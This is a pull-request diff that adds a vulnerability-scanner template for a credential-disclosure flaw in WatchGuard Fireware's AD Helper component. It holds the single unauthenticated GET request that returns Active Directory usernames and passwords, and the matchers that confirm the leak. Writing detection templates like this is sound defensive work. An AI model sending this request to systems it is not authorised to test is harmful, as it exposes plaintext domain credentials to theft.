Merge pull request #3303 from gy741/rule-add-v77

Create watchguard-fireware-ad-helper-component-credentials-disclosure

vulnerabilities/other/watchguard-credentials-disclosure.yaml

@@ -0,0 +1,31 @@
+id: watchguard-credentials-disclosure
+
+info:
+  name: WatchGuard Fireware AD Helper Component - Credentials Disclosure
+  author: gy741
+  severity: critical
+  description: A credential-disclosure vulnerability in the AD Helper component of the WatchGuard Fireware Threat Detection and Response (TDR) service, which allows unauthenticated attackers to gain Active Directory credentials for a Windows domain in plaintext.
+  reference:
+    - https://www.exploit-db.com/exploits/48203
+    - https://www.watchguard.com/wgrd-blog/tdr-ad-helper-credential-disclosure-vulnerability
+  tags: watchguard,disclosure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"fullyQualifiedName"'
+          - '"logonDomain"'
+          - '"username"'
+          - '"password"'
+        condition: and
+
+      - type: status
+        status:
+          - 200